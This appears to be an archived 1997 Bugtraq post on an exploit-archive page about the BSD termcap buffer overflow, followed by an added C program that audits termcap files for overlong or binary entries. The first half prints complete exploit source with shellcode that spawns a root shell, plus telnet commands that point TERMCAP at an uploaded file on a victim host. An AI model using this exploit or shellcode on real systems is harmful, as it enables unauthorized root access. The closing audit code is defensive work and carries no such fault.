BSD Termcap overflow

Summary
Description: This program creates a malicious termcap file which can cede root access.
Author: Bug originally discovered by Theo de Raadt <deraadt@CVS.OPENBSD.ORG>; exploit written by Joseph_K on 22-Oct-1997
Compromise: Theoretically this may allow you to become root remotely; you can definitely become root locally.
Vulnerable Systems: BSDI, probably FreeBSD/NetBSD/OpenBSD prior to October 1997
Date: 1 December 1997
Details


Date: Mon, 1 Dec 1997 06:24:55 -0800
From: John Brahy <jbrahy@HADES.LB.DEVRY.EDU>
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: in.telnetd bug (linux)

There is a BSD exploit that works on the termcap file. It has some entries
like this.

 telnet> env def TERM access
 telnet> env def TERMCAP /path/and/name/of/uploaded/file
 telnet> open victim.host.com

and the source code is here:
--------SNIP-----

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>

#define filename "./termcap"
#define entry   "access|Gimme r00t:\\\n :"
#define bufsize 1300
#define default_offset 870    /* Should work...*/

char shellcode[] =
   "\xeb\x35\x5e\x59\x33\xc0\x89\x46\xf5\x83\xc8\x07\x66\x89\x46\xf9"
   "\x8d\x1e\x89\x5e\x0b\x33\xd2\x52\x89\x56\x07\x89\x56\x0f\x8d\x46"
   "\x0b\x50\x8d\x06\x50\xb8\x7b\x56\x34\x12\x35\x40\x56\x34\x12\x51"
   "\x9a\x3e\x39\x29\x28\x39\x3c\xe8\xc6\xff\xff\xff/bin/sh";

/* Returns the current stack pointer. i386 only: relies on the value
   being left in %eax, which is where the caller reads the result. */
long get_sp(void)
{
   __asm__("movl %esp, %eax\n");
}

int main(int argc, char *argv[]) {
   int i, fd, offs;
   long *bof_ptr;
   char *ptr, *buffer, *tempbuf;

   offs = default_offset;

   if(argc == 2) {
      printf("using offset: %d\n",atoi(argv[1]));
      offs = atoi(argv[1]);
   }

   if(!(buffer = malloc(bufsize))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }

   if(!(tempbuf = malloc(bufsize+strlen(entry) + 50))) {
      printf("can't allocate enough memory\n");
      exit(0);
   }

   /* fill the whole buffer with the guessed return address */
   bof_ptr = (long *)buffer;
   for (i = 0; i < bufsize - 4; i += 4)
      *(bof_ptr++) = get_sp() - offs;

   /* overwrite the first half with 0x90 padding, then the shellcode */
   ptr = (char *)buffer;
   for (i = 0; i < ((bufsize-strlen(shellcode)))/2 - 1; i++)
      *(ptr++) = 0x90;

   for (i = 0; i < strlen(shellcode); i++)
      *(ptr++) = shellcode[i];

   printf("Creating termcap file\n");

   /* the oversized entry is what overflows the termcap buffer */
   snprintf(tempbuf, (bufsize+strlen(entry)+50), "%s%s:\n", entry, buffer);
   fd = open(filename, O_WRONLY|O_CREAT, 0666);
   write (fd, tempbuf, strlen(tempbuf));
   close(fd);
   return 0;
}

--------SNIP------------

PEOPLE who actually wrote this:

Bug originally discovered by Theo de Raadt <deraadt@CVS.OPENBSD.ORG>
BSDI BSD/OS 2.1 telnet-exploit
Written by Joseph_K the 22-Oct-1997
Original shellcode by mudge@l0pht.com but modified a tiny bit...
John Brahy, CNA
DeVry Institute of Technology, Long Beach, California
Computer Information Systems / mailto://jbrahy@hades.lb.devry.edu
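The attack above only works because the old BSD termcap routines copied a matching TERMCAP entry into a fixed-size buffer without checking its length. The following C program is an added defender's example, not code from the original post: it audits a termcap file for entries that would overrun the classic 1024-byte tgetent() buffer (that limit is an assumption taken from the termcap(3) interface) or that contain non-printable bytes, which is what a 0x90 sled and raw shellcode look like inside a text database. The sample termcap text it scans is constructed inline.

```c
#include <stdio.h>
#include <string.h>
#include <ctype.h>

/* Assumed limit: classic tgetent() expects a 1024-byte caller buffer. */
#define TC_SAFE_LEN 1024
enum { TC_OK = 0, TC_TOO_LONG = 1, TC_BINARY = 2 };

/* Audit one logical entry (continuations joined); returns a TC_* bitmask. */
int audit_termcap_entry(const char *ent, size_t len)
{
    int flags = len >= TC_SAFE_LEN ? TC_TOO_LONG : TC_OK;
    size_t i;
    for (i = 0; i < len; i++)   /* 0x90 sleds and raw code never belong here */
        if (!isprint((unsigned char)ent[i]) && ent[i] != '\t' && ent[i] != '\n')
            flags |= TC_BINARY;
    return flags;
}

/* Walk a termcap text. An entry ends at a newline not escaped by a
 * backslash; that escape is how "...r00t:\" above continues to " :".
 * Reports each flagged entry and returns how many there were. */
int audit_termcap_text(const char *text)
{
    const char *start = text, *p = text;
    int bad = 0;
    for (;; p++) {
        if (*p != '\0' && (*p != '\n' || (p != start && p[-1] == '\\')))
            continue;                       /* still inside this entry */
        if (p > start) {
            int f = audit_termcap_entry(start, (size_t)(p - start));
            if (f != TC_OK) {
                bad++;
                printf("entry at offset %ld: %ld bytes%s%s\n", (long)(start - text),
                       (long)(p - start), (f & TC_TOO_LONG) ? " TOO LONG" : "",
                       (f & TC_BINARY) ? " NON-PRINTABLE" : "");
            }
        }
        if (*p == '\0')
            break;
        start = p + 1;
    }
    return bad;
}

int main(void)
{   /* Constructed sample: a benign vt100 entry, then one padded with a 0x90 sled */
    static char sample[TC_SAFE_LEN + 64] = "vt100|dec vt100:\\\n\t:co#80:\nevil|x:";
    memset(sample + strlen(sample), 0x90, TC_SAFE_LEN);
    strcpy(sample + strlen(sample), ":\n");
    return audit_termcap_text(sample) == 1 ? 0 : 1;
}
```

Run it against a real file by reading it into memory and passing the text to audit_termcap_text(); any entry reported as TOO LONG or NON-PRINTABLE deserves a manual look.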

This page is part of Fyodor's exploit world.